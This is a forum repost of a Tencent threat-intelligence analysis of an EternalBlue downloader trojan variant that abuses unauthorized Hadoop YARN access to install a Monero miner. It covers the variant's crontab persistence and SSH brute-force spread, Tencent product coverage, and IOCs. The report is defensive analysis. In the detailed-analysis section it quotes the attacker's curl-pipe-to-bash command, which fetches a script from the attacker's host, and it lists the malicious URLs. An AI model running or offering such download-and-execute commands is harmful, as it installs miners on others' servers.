永恒之蓝木马下载器再更新，云上主机成为新目标

admin

感谢腾讯御见威胁情报中心来稿！
原文链接：https://mp.weixin.qq.com/s/953ZHaf8IjLGyxB3tWSoDQ


一、概述

腾讯安全威胁情报中心检测到永恒之蓝下载器木马新增利用Hadoop Yarn未授权访问漏洞攻击。该变种入侵Linux服务器后下载门罗币挖矿木马，然后将挖矿任务进行持久化、清除竞品挖矿木马，并通过SSH爆破横向移动。
永恒之蓝下载器木马自2018年底出现以来，一直处于活跃状态。该病毒不断变化和更新攻击手法，从最初只针对Windows系统扩大攻击范围到Linux系统。截止目前，其攻击手法已涵盖弱口令爆破、系统漏洞利用、Web漏洞利用等，其中利用SSH、Redis、Hadoop Yarn服务的攻击方式可能对云主机以及云上业务造成较大威胁。其主要入侵方式列表如下：

腾讯安全系列产品针对永恒之蓝下载器木马最新变种的响应清单如下 ：

应用场景	安全产品	解决方案
威胁情报	腾讯T-Sec</p>威胁情报云查服务 （SaaS）	1）永恒之蓝下载器木马黑产团伙相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics
	腾讯T-Sec 高级威胁追溯系统	1）永恒之蓝下载器木马黑产团伙相关信息和情报已支持检索。 网管可通过威胁追溯系统，分析日志，进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息，可参考：https://cloud.tencent.com/product/atts
云原生安全防护	云防火墙 （Cloud Firewall，CFW）	基于网络流量进行威胁检测与主动拦截，已支持： 1）永恒之蓝漏洞MS17-010; 2）SMBGhost漏洞CVE-2020-0796; 3）Redis未授权访问漏洞; 4）Hadoop Yarn未授权访问漏洞 有关云防火墙的更多信息，可参考：  https://cloud.tencent.com/product/cfw
	腾讯T-Sec  主机安全 （Cloud Workload Protection，CWP）	已支持检测： 1）永恒之蓝漏洞MS17-010; 2）SMBGhost漏洞CVE-2020-0796; 3）Redis未授权访问漏洞; 4）Hadoop Yarn未授权访问漏洞 腾讯主机安全（云镜）提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息，可参考：https://cloud.tencent.com/product/cwp
	腾讯T-Sec 网络资产风险监测系统 （腾讯御知）	1）腾讯御知已支持监测全网资产是否受永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796影响。 2）已集成无损检测POC，企业可以对自身资产进行远程检测。 关于腾讯T-Sec网络资产风险监测系统的更多信息，可参考：https://s.tencent.com/product/narms/index.html
	腾讯T-Sec 安全运营中心	基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全（云镜）、腾讯御知等产品数据导入，为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息，可参考：https://s.tencent.com/product/soc/index.html
非云企业安全防护	腾讯T-Sec 高级威胁检测系统 （腾讯御界）	基于网络流量进行威胁检测，已支持检测： 1）永恒之蓝漏洞MS17-010; 2）SMBGhost漏洞CVE-2020-0796; 3）Redis未授权访问漏洞; 4）Hadoop Yarn未授权访问漏洞 关于T-Sec高级威胁检测系统的更多信息，可参考： https://cloud.tencent.com/product/nta
	腾讯T-Sec终端安全管理系统（御点）	1）可查杀永恒之蓝下载器木马团伙入侵释放的后门木马、挖矿木马程序； 2）已支持检测黑产利用永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796入侵相关的网络通信。 3）已支持检测利用Lnk漏洞CVE-2017-8464、Office漏洞CVE-2017-8570攻击的病毒程序； 腾讯御点提供企业终端的防毒杀毒、防入侵、漏洞管理、基线管理等能力，关于T-Sec终端安全管理系统的更多资料，可参考：https://s.tencent.com/product/yd/index.html

二、详细分析

Hadoop是一个由Apache基金会所开发的分布式系统基础架构，YARN是hadoop系统上的资源统一管理平台，其主要作用是实现集群资源的统一管理和调度，可以把MapReduce计算框架作为一个应用程序运行在YARN系统之上，通过YARN来管理资源。用户可以向YARN提交特定应用程序进行执行，其中就允许执行相关包含系统命令。
YARN提供有默认开放在8088和8090的REST API（默认前者）允许用户直接通过API进行相关的应用创建、任务提交执行等操作，如果配置不当，REST API将会开放在公网导致未授权访问的问题，攻击者可以在未授权的情况下远程执行代码。
永恒之蓝下载器木马变种在yarnexec()函数中对yarn未授权访问漏洞进行利用。


攻击成功后执行远程命令：
export src=yarn;curl -fsSL t.amynx.com/ln/core.png?yarn|bashcore.png首先下载门罗币挖矿木马d.ackng.com/ln/xr.zip并启动挖矿进程/.Xll/xr，然后添加crontab定时任务将挖矿作业持久化。

清除竞品挖矿木马：

利用SSH爆破进行横向移动：

永恒之蓝下载器木马历次版本更新情况如下：

 IOCs

URL
http[:]//d.ackng.com/ln/xr.zip
http[:]//t.amynx.com/ln/core.png
http[:]//t.amynx.com/ln/a.asp
http[:]//t.jdjdcjq.top/ln/a.asp
MD5
if.bin
888dc1ca4b18a3d424498244acf81f7d
a.jsp(powershell)
c21caa84b327262f2cbcc12bbb510d15
kr.bin
e04acec7ab98362d87d1c53d84fc4b03
core.png
e49367b9e942cf2b891f60e53083c938
a.jsp(shell)
b204ead0dcc9ca1053a1f26628725850
gim.jsp
b6f0e01c9e2676333490a750e58d4464
矿池：
lplp.ackng.com:444
参考链接：

1. Hadoop Yarn REST API未授权漏洞利用挖矿分析 https://www.freebuf.com/vuls/173638.html
2. 关于Apache Hadoop Yarn资源管理系统REST API未授权漏洞通知 https://bbs.qcloud.com/thread-50090-1-1.html
3. 永恒之蓝下载器最新变种重启EXE文件攻击，新变种已感染1.5万台服务器 https://s.tencent.com/research/report/1038.html
4.https://github.com/vulhub/vulhub/blob/master/hadoop/unauthorized-yarn/exploit.py


（封面来自网络）

Leo962

果断回帖，如果沉了就是我弄沉的很有成就感

薇唯玮味

不错，又占了一个沙发！

毛当归搜

谢谢分享！一直在找

123457771

感谢分享！

大叔的爸爸

亲测可用 谢谢楼主

尹泽汐猩

感谢分享！

张玉萍Pilar

这个是好东东，收藏备用

内托体头

看了LZ的帖子，我只想说一句很好很强大！

张玉萍Pilar

永远支持中国黑防联盟：www.vcs6.com